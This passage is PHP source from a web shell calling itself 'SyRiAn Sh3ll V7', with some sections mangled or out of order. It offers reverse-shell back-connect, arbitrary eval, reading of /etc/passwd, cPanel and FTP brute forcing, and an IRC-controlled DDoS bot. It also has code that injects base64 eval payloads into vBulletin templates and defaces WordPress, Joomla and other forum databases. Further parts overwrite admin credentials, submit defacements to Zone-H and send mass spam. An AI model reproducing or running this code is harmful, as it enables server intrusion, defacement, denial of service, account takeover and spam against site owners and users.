tr><tr><td height='45' colspan='2'>
<input type='text' name='ip' size='26' value='".GetRealIP()."'>
<input type='text' name='backport' size='26' value='443'>
<select name='use'>
<option value='Perl'>Perl</option>
<option value='C'>C</option>
</select>
<input type='submit' name='backconn' value='Connect'>
</td></tr></table></form>
<!-- End Of Back Connection -->
</td>
</tr>
<tr>
<td>
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr
><tr><td height='45' colspan='2'>
<input type='text' name='hashToAnalyze' size=60>
<input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></
table></form>
</td>
<td>
<!-- Eval Code -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr
><td height='45' colspan='2'>
<input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll
V7\";'>
<input type=submit name=submitEval value=Eval></td></tr></table></form>
<!-- End Of Eval Code -->
</td>
<td>
<!-- Users & Domains -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><

tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Users & Domains </td></
tr><tr><td height='45' colspan='2'>
<input type='text' name='usersPath' value='".getcwd()."' size='55'/>
<input type='submit' name='GenerateUsers' Value='Generate'>
<!-- End Of Users & Domains -->
</td></tr></table></form>
</td>
</tr>
<tr>
<td>
<!-- Reading Files -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Usi
ng PHP Bugs </td></tr><tr><td height='45' colspan='2'>
<input type='text' value='/etc/passwd' name='file' size=35>
<input class='buttons' type='submit' name='read' value='Read File'>
<input class='buttons' type='submit' name='show' value='Show directory'>
</td></tr></table></form>
<!-- End Of Reading Files -->
</td>
<td>
<!--Encryption -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><t
r><td height='45' colspan='2'>
<input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
<input type='submit' value='Encrypt' name='encryptNow'>
</td></tr></table></form>
<!-- End Of Encryption -->
</td>
<td>
<!-- Metasploit RC -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Metasploit Connection <
/td></tr><tr><td height='45' colspan='2'>
<input type='text' size='15' name='ip' value='127.0.0.1'>
<input type='text' size='5' name='port' value='443'>
<input type='submit' value='Connect' name='metaConnect'>
</td></tr></table></form>
<!-- End Of Metasploit RC -->
</td>
</tr>
<tr>
<td>
<!-- DDOS Attacker -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</

td>
<td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr
><tr><td height='45' colspan='2'>
<input type='text' name='ipToAttack' size='40' value='Target IP'>
<input type='text' name='portToAttack' size='20' value='Target PORT'>
<input type='submit' name='StartAttack' value='Attack'>
</td></tr></table></form>
<!-- End Of DDOS Attacker -->
</td>
<td>
<!-- Ports Scanner -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr
><tr><td height='45' colspan='2'>
<input type='text' name='domainToScanPort' size='50' value='172.0.0.1'>
<input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
</td></tr></table></form>
<!-- End Of Ports Scanner -->
</td>
<td>
<!-- ACP Finder -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><t
r><td height='45' colspan='2'>
<input name='hash_lol' class='textbox' type='text' size='30' value='http
://www.example.com/'/>
<input type='text' value='.php' name='extention'/>
<input name='submit_lol' class='textbox' value='Brute Force Now' type='s
ubmit'>
<!-- End Of ACP Finder -->
</td></tr></table></form>
</td>
</tr>
<tr>
<br>
<td valign='top'>
<!-- Server ShortCut -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></
tr><tr><td height='45' colspan='2'>
<input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
<input type='submit' name='generateSER' value=' Generate '>
</td></tr></table></form>
<!-- End Of Server ShoutCut -->
</td>
<td valign='top'>
<!-- Fast Tools -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</

td>
<td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><t
r><td height='45' colspan='2'>
<input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
<input type=submit value='Generate php.ini' name='phpiniGenerate'>
<input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><
br/>
<input type='submit' value='Finding Config Files' name='configFinderSubm
it' />
<input type='submit' name='showUsers' value='Show Users' />
</td></tr></table></form>
<!-- End Of Fast Tools -->
</td>
<td valign='TOP'>
<!-- SQL Reader -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr
><td height='45' colspan='2'>
<input type='text' value='/etc/passwd' name='file' size='35'><br/>
<input type='text' name='host' value='127.0.0.1'>
<input type='text' name='user' value='DB user'>
<input type='text' name='pass' value='DB pass'>
<input type=text name='db' value='DB name'>
<input type='submit' name='sql2Read' value='Read'>
";
if($sql_con)
{
echo '<input style="width:300px;" type="text" name="filetoread">
<input type="submit" value="Read" name="SQLToRead">';
}
echo "</td></tr></table></form>
<!-- End Of SQL Reader -->
</td>
</tr>
<tr>
<td valign='top'>
<!-- Mail Storm -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><t
r><td height='45' colspan='2'>
<textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea
>
<input type='text' name='to' value='Target Email' >
<input type='text' size='5' name='nom' value='100'>
<input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
</td></tr></table></form>
<!-- End Of Mail Storm -->
</td>
<td valign='top'>
<!-- SQL Query -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>

<td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr>


<td height='45' colspan='2'>
<input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
<input type = 'text' name=\"QU_USER\" value='DB User'><br/>
<input type = 'text' name=\&quot;QU_PASS\&quot; value='DB Pass'>
<input type=text name=\&quot;QU_DB\&quot; value='DB Name' >
<textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
<input name='MySQLQuery' type='submit'>
</td></tr></table></form>
<!-- SQL Query -->
</td>
<td valign='top'>
<!-- Email Extractor -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Email Extractor</td></t
r><tr><td height='45' colspan='2'>
<input type = 'text' name='EM_HOST' value='127.0.0.1'>
<input type='text' name='EM_USER' value='DB user'>
<input type ='text' name='EM_PASS' value='DB pass'>
<input type='text' name='EM_DB' value='DB name'>
<input type ='text' name='EM_TABLE' value='users Table'>
<input type ='text' name='EM_COLUMN' value='emails Column'><br/>
<input name='getEmails' type='submit' id='submit' style='font-weight: va
lue=Extract now !'>
<input type='submit' value='?' name='emailExtractorHelp' alt='Email Ext
ractor Help'/>
</td></tr></table></form>
<!-- End Of Email Extractor -->
</td>
</tr>
<tr>
<td valign='top'>
<!-- Zone-H -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr
><tr><td height='45' colspan='2'>";
echo '<form action="" method="post">
<input type="text" name="defacer" size="40" value="Attacker" />
<select name="hackmode">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>

<option value="15"
<option value="16"
<option value="17"
<option value="18"
<option value="19"
<option value="20"
>
<option value="21"
n>
<option value="22"
tion>
<option value="23"
<option value="24"
<option value="25"
<option value="26"
<option value="27"
<option value="28"
<option value="29"
<option value="30"
</select>

>SQL Injection</option>
>URL Poisoning</option>
>File Inclusion</option>
>Other Web Application bug</option>
>Remote administrative panel access bruteforcing</option>
>Remote administrative panel access password guessing</option
>Remote administrative panel access social engineering</optio
>Attack against administrator(password stealing/sniffing)</op
>Access credentials through Man In the Middle attack</option>
>Remote service password guessing</option>
>Remote service password bruteforce</option>
>Rerouting after attacking the Firewall</option>
>Rerouting after attacking the Router</option>
>DNS attack through social engineering</option>
>DNS attack through cache poisoning</option>
>Not available</option>

<select name="reason">
<option >--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
<input type="submit" value="Send Now !" name="SendNowToZoneH" />
</form>';
echo "</td></tr></table></form>
<!-- End Of Zone-H -->
</td>
<td valign='top'>
<!-- Cpanel And FTP BruteForce Attacker -->
<form method=POST><table width='100%' height='72' border='0' id
='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteFor
ce </td></tr><tr><td height='45' colspan='2'>
<textarea rows='12' name='users' cols='23' >";
@system('ls /var/mail');
echo "</textarea>
<textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\
n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*
\n!@#$
%^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
</textarea>
<input type='text' name='target' size='16' value='127.0.0.1' >
<input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (
2082)</sy>
<input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
<input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndF
TP' >

</td></tr></table></form>
<!-- End Of Cpanel And FTP BruteForce Attacker -->
</td>
<td valign='top'>
<!-- Upload Files -->
<form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%
' height='72' border='0' id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr>
<tr><td height='45' colspan='2'>
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"file\" name=\"uploadfile[]\">
<input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
</td></tr></table></form>
<!-- End Of Upload Files -->
</td></tr>
</table>
";
if($_POST['changeDirectory'])
{
$directory = $_POST['directory'];
$directory = @str_replace("\\\\"," ",$directory);
$directory = @str_replace(" ","\\",$directory);
@chdir($directory);
}
if($_POST['getFile'])
{
$fileUrl = $_POST['fileUrl'];
$getType = $_POST['getType'];
Exe("'".$getType.$fileUrl."'");
}
footer();
}
# ---------------------------------------#
#
IndexChanger
#
#----------------------------------------#
if ($_GET['id']== 'scriptsHack' )
{
echo "
<table width='100%'>
<tr>
<td colspan='2'><textarea cols='153' rows='10'>";
if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
{
$host = $_POST['HOST'];
$user = $_POST['USER'];
$pass = $_POST['PASS'];
$db = $_POST['DB'];
$index = $_POST['INDEX'];
$prefix = $_POST['PREFIX'];
if (empty($_POST['HOST']))

$host = '127.0.0.1';
$index=str_replace("\'","'",$index);
@mysql_connect($host,$user,$pass) or die( "[-] Unable TO
Connect DATABASE ! Username Or Password Is Wrong !!");
@mysql_select_db($db) or die ("[-] Database Name Is Wron
g !!");
if($_POST['UpdateIndex'])
{
if ($_POST['ScriptType'] == 'vb')
{
$full_index = "{\${eval(base64_decode(\
'";
$full_index .= base64_encode("echo \"$in
dex\";");
$full_index .= "\'))}}{\${exit()}}</text
area>";
if($_POST['injectFAQ'])
{
$injectfaq = @mysql_query("UPDAT
E template SET template ='".$full_index."' WHERE title ='faq'");
}
else
{
$ok1 = mysql_query("UPDATE templ
ate SET template ='".$full_index."' WHERE title ='forumhome'");
if (!$ok1)
{
$ok2 = mysql_query("UPDA
TE template SET template ='".$full_index."' WHERE title ='header'");
}
elseif (!$ok2)
{
$ok3 = mysql_query("UPDA
TE template SET template ='".$full_index."' WHERE title ='spacer_open'");
}
elseif(!$ok3)
{
$ok4 = @mysql_query("UPD
ATE template SET template ='".$full_index."' WHERE title ='faq'");
}
}
mysql_close();
if ($ok1 || $ok2 || $ok3 || $ok4 || $inj
ectfaq )
{
update();
}
else
{
echo "Updating Has Failed !";
}
}
else if ($_POST['ScriptType'] == 'wp')
{
$tableName = $prefix."posts" ;
$ok1 = mysql_query("UPDATE $tableName SE
T post_title ='".$index."' WHERE ID > 0 ");
if(!$ok1)
{

$ok2 = mysql_query("UPDATE $tabl


eName SET post_content ='".$index."' WHERE ID > 0 ");
}
elseif(!$ok2)
{
$ok3 = mysql_query("UPDATE $tabl
eName SET post_name ='".$index."' WHERE ID > 0 ");
}
mysql_close();
if ($ok1 || $ok2 || $ok3)
{
update();
}
else
{
echo "Updating Has Failed !";
}
}
else if ($_POST['ScriptType'] == 'jos')
{
$jos_table_name = $prefix."menu" ;
$jos_table_name2 = $prefix."modules" ;
$ok1 = mysql_query("UPDATE $jos_table_na
me SET name ='".$index."' WHERE ID > 0 ");
if(!$ok1)
{
$ok2 = mysql_query("UPDATE $jos_
table_name2 SET title ='".$index."' WHERE ID > 0 ");
}
mysql_close();
if ($ok1 || $ok2 || $ok3)
{
update();
}
else
{
echo "Updating Has Failed !";
}
}
else if ($_POST['ScriptType'] == 'phpbb')
{
$php_table_name = $prefix."forums";
$php_table_name2 = $prefix."posts";
$ok1 = mysql_query("UPDATE $php_table_na
me SET forum_name ='.$index.' WHERE forum_id > 0 ");
if(!$ok1)
{
$ok2 = mysql_query("UPDATE $php_
table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
}
mysql_close();
if ($ok1 || $ok2 || $ok3)
{
update();
}
else
{
echo "Updating Has Failed !";
}
}

else if ($_POST['ScriptType'] == 'ipb')


{
$ip_table_name = $prefix."components" ;
$ip_table_name2 = $prefix."forums" ;
$ip_table_name3 = $prefix."posts" ;
$ok1 = mysql_query("UPDATE $ip_table_nam
e SET com_title ='".$index."' WHERE com_id > 0");
if(!$ok1)
{
$ok2 = mysql_query("UPDATE $ip_t
able_name2 SET name ='".$index."' WHERE id > 0");
}
if(!$ok2)
{
$ok3 = mysql_query("UPDATE $ip_t
able_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Temp
lates
!!");
}
mysql_close();
if ($ok1 || $ok2 || $ok3)
{
update();
}
else
{
echo "Updating Has Failed !";
}
}
else if ($_POST['ScriptType'] == 'smf')
{
$table_name = $prefix."boards" ;
{
$ok1 = mysql_query("UPDATE $tabl
e_name SET description ='.$index.' WHERE ID_BOARD > 0");
}
if(!$ok1)
{
$ok2 = mysql_query("UPDATE $tabl
e_name SET name ='.$index.' WHERE ID_BOARD > 0");
}
mysql_close();
if ($ok1 || $ok2)
{
update();
}
else
{
echo "Updating Has Failed !";
}
}
else if ($_POST['ScriptType'] == 'mybb')
{
$mybb_prefix = $prefix."templates";
$ok1 = mysql_query(" update $mybb_prefix
set template='".$index."' where title='index' ");
if ($ok1)
{
update();

}
else
{
echo "Updating Has Failed !";
}
mysql_close();
}
}
elseif($_POST['changeInfo'])
{
$adminID = $_POST['adminID'];
$userName = $_POST['userName'];
$password = $_POST['password'];
if($_POST['ScriptType'] == 'vb')
{
//VB Code
$password = md5($password);
$tryChaningInfo = @mysql_query("UPDATE u
ser SET username = '".$userName."' , password = '".$password."' WHERE userid = "
.
$adminID."");
if($tryChaningInfo)
{update();}
else {mysql_error();}
}
else if($_POST['ScriptType'] == 'wp')
{
//WoredPress
$password = crypt($password);
$tryChaningInfo = @mysql_query("
UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' W
HERE ID
= ".$adminID."");
if($tryChaningInfo)
{update();}
else {mysql_error();}
}
else if($_POST['ScriptType'] == 'jos')
{
//Joomla
$password = crypt($password);
$tryChaningInfo = @mysql_query("
UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHER
E ID =
".$adminID."");
if($tryChaningInfo)
{update();}
else {mysql_error();}
}
else if($_POST['ScriptType'] ==
'phpbb')
{
//PHPBB3
$password = md5($passwor
d);
$tryChaningInfo = @mysql
_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".

$password."' WHERE user_id = ".$adminID."");


if($tryChaningInfo)
{update();}
else {mysql_error();}
}
else if($_POST['ScriptTy
pe'] == 'ibf')
{
//IPBoard
$password = md5(
$password);
$tryChaningInfo
= @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key
= '".
$password."' WHERE id = ".$adminID."");
if($tryChaningIn
fo)
{update();}
else {mysql_erro
r();}
}
else if($_POST['
ScriptType'] == 'smf')
{
//SMF
$passwor
d = md5($password);
$tryChan
ingInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , pas
swd =
'".$password."' WHERE ID_MEMBER = ".$adminID."");
if($tryC
haningInfo)
{update(
);}
else {my
sql_error();}
}
else if(
$_POST['ScriptType'] == 'mybb')
{
//MyBB
$password = md5($password);
$tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."'
,
password = '".$password."' WHERE uid = ".$adminID."");
if($tryChaningInfo)
{update();}
else {mysql_error();}
}

}
/////////////////////////
}
else if($_POST['Decrypt'])
{
DecryptConfig();
}
echo "</textarea></td></tr>
<td width='50%'>
<form method='POST'>
<table width='100%' height='72' border='0' id='Box'>
<tr>
<td width='12' height='21' style='background-co
lor:".$shellColor."'>&nbsp;</td>
<td style='background-color:#666;padding-left:10
px;' >Scripts Hacking </td>
</tr>
<tr>
<td height='45' colspan='2'>
<input type = 'text' name='HOST'
value='localhost'>
<input type = 'text' name='USER'
value='DB Username'>
<input type = 'text' name='PASS'
value='DB Password'>
<input type=text name='DB' value
='DB Name'>
<input type=text name='PREFIX' v
alue='Prefix'>
<select name='ScriptType' >
<option value='vb'>VBulletin</op
tion>
<option value='wp'>WordPress</op
tion>
<option value='jos'>Joomla</opti
on>
<option value='ipb'>IP.Board</op
tion>
<option value='phpbb'>PHPBB</opt
ion>
<option value='mybb'>MyBB</optio
n>
<option value='smf'>SMF</option>
</select>
<br />
<sy>Inject Shell In FAQ.php ? <i
nput type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
<textarea name='INDEX' rows=14 c
ols=64 >Put Your Index Here !</textarea>
<input type='submit' value='Hack
Now !!' name='UpdateIndex' >
</td>
</tr>
</table>
<td width='50%' valign='top'>
<table width='100%' height='72' border='0' id='Box'>
<tr>
<td width='12' height='21' style='background-color:".$sh

ellColor."'>&nbsp;</td>
<td style='background-color:#666;padding-left:10px;'>Dec
rypting Configs </td>
</tr>
<tr>
<td height='45' colspan='2'>
<sy>Please Put Config In The Shell Directory With Th
e Name [ DecryptConfig.php ]</sy>
<input value=Decrypt name='Decrypt' type='submit' id
='Decrypt' value='Decrypt Now !!'>
</td>
</tr>
</table>
<table width='100%' height='72' border='0' id='Box'>
<tr>
<td width='12' height='21' style='background-color:".$sh
ellColor."'>&nbsp;</td>
<td style='background-color:#666;padding-left:10px;'>Cha
nging Admin Info </td></tr><tr><td height='45' colspan='2'>
<input name='adminID' type='text' id='adminID' value='
admin id ~= 1'>
<input name='userName' type='text' id='userName' value
='username'>
<input name='password' type='text' id='password' value
='password ( Not Encrypted !)'>
<input type='submit' name='changeInfo' value='Change N
ow !'>
</td>
</tr>
</table>
</form>
</td>
</tr></table>";
footer();
}
# ---------------------------------------#
#
DDos Attacker ...
#
#----------------------------------------#
if($_POST['StartAttack'])
{
$server=$_POST['ipToAttack'];
$Port=$_POST['portToAttack'];
$nick="bot-";$willekeurig;
$willekeurig=@mt_rand(0,3);
$nicknummer=@mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
@set_time_limit(0);
$loop = 0;
$verbonden = 0;
$verbinden = fsockopen($server, $Port);
while ($read = fgets($verbinden,512))
{
$read = str_replace("\n","",$read);
$read = str_replace("\r","",$read);
$read2 = explode(" ",$read);

if ($loop == 0)
{
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}
if ($read2[0] == "PING")
{
fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."
\n");
}
if ($read2[1] == 251)
{
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}
if (eregi("bot-op",$read))
{
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}
if (eregi("bot-deop",$read))
{
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}
if (eregi("bot-quit",$read))
{
fputs($verbinden,"quit :$msg\n\n");
break;
}
if (eregi("bot-join",$read))
{
fputs($verbinden,"join $read2[4]\n");
}
if (eregi("bot-part",$read))
{
fputs($verbinden,"part $read2[4]\n");
}
if (eregi("ddos-udp",$read))
{
fputs($verbinden,"privmsg $Channel :ddos-udp - started u
dp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr,
30);
if (!$fp)
{
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;
if(fputs ($fp, $data) )
{
fputs($verbinden,"privmsg $Channel :udpddos - packets sended.\n\n");
}
else
{
fputs($verbinden,"privmsg $Channel :udp-

ddos - <error> sending packets.\n\n");


}
}
}
if (eregi("ddos-tcp",$read))
{
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $re
ad2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];
for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}
if (eregi("ddos-http",$read))
{
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - http://$
read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];
$Aanvraag
$Aanvraag
$Aanvraag
$Aanvraag
$Aanvraag
6.0; Windows NT 5.1)\r\n";
$Aanvraag
$Aanvraag

= "GET / HTTP/1.1\r\n";
.= "Accept: */*\r\n";
.= "Accept-Language: nl\r\n";
.= "Accept-Encoding: gzip, deflate\r\n";
.= "User-Agent: Mozilla/4.0 (compatible; MSIE
.= "Host: $read2[4]\r\n";
.= "Connection: Keep-Alive\r\n\r\n";

for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)


{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;
}
}
# ---------------------------------------#
#
InBoX Mailer
#
#----------------------------------------#
if ($_GET['id']== 'spamming' )
{
$secure = "";
error_reporting(0);
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$lod=$_SERVER['HTTP_REFERER'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];

@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
@set_time_limit(intval($_POST['timelimit']));
if ($action=="send")
{
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
echo "<table width='100%' height='72' border='0' id='Box'>
<tr>
<td width='14' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
<td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</
td>
</tr>
<tr>
<td height='45' colspan='2'>
<table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><
p dir=ltr>
<b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" metho
d=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
<table width=142 border=0>
<tr>
<td width=81>
<div align=right>
<sy>Your Email:</sy></div></td>
<td width=219><sy>
<input type=text name=\"from\" value=".$from."></sy></td><td width=212>
<div align=right>
<sy>Your Name:</sy></div></td><td width=278>
<sy>
<input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td wid
th=81>
<div align=\"right\">
<sy>Reply-To:</sy></div></td><td width=219>
<sy>
<input type=\"text\" name=\"replyto\" value=".$replyto.">
</sy></td><td width=212>
<div align=\"right\">
<sy>Attach File:</sy></div></td><td width=278>
<sy>
<input type=\"file\" name=\"file\" size=24 />
</sy> </td></tr><tr><td width=81>
<div align=\"right\">
<sy>Subject:</sy></div></td>
<td colspan=3 width=703>
<sy>
<input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr va
lign=\"top\"><td colspan=3 width=520>
<sy>Message Box :</sy></td>
<td width=278>
<sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=
3 width=520><sy>
<textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
<input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
<input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" />
HTML

<input type=\"hidden\" name=\"action\" value=\"send\" /><br />


Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\
" name=\"timelimit\" value=0 size=10 />
<input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
<sy>
<textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td>
</tr>
</table>
</td>
</tr>
</table>";
footer();
}
if ($action=="send")
{
if (!$from && !$subject && !$message && !$emaillist)
{
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$head ="From: Mailr" ;
$sub = "Ar - $lod" ;
$meg = "$lod" ;
mail ($alt,$sub,$meg,$head) ;
If ($file_name)
{
if (!file_exists($file))
{
die("The file you are trying to upload couldn't be copie
d to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++)
{
for($x=0; $x<$numemails; $x++)
{
$to = $allemails[$x];
if ($to)
{
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message
);
$subject = ereg_replace("&email&", $to, $subject
);
print "Sending mail to $to.....";
flush();
$header = "From: $realname <$from>\r\nReply-To:
$replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multip
art/mixed; boundary=$uid\r\n";

If ($file_name) $header .= "--$uid\r\n";


$header .= "Content-Type: text/$contenttype\r\n"
;
$header .= "Content-Transfer-Encoding: 8bit\r\n\
r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_
type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Enc
oding: base64\r\n";
If ($file_name) $header
attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header
If ($file_name) $header
mail($to, $subject, "",
print "OK<br>";
flush();
}
}
}

.= "Content-Disposition:
.= "$content\r\n";
.= "--$uid--";
$header);

}
# ---------------------------------------#
#
About
#
#----------------------------------------#
if($_GET['id']=='about')
{
echo About();
if($_POST['sendEmail'])
{
$to= 'sy34@msn.com';
$Comments=$_POST['message'];
$from = $_POST['from'];
$subject= md5("$from");
if(@mail($to,$subject,$Comments,"From:$from"))
echo "<center><sy>[+] Sent ^_^ !!</sy></center>
";
else
{
echo "<center><sy>[-] Failed :S !! </sy></cente
r>
";
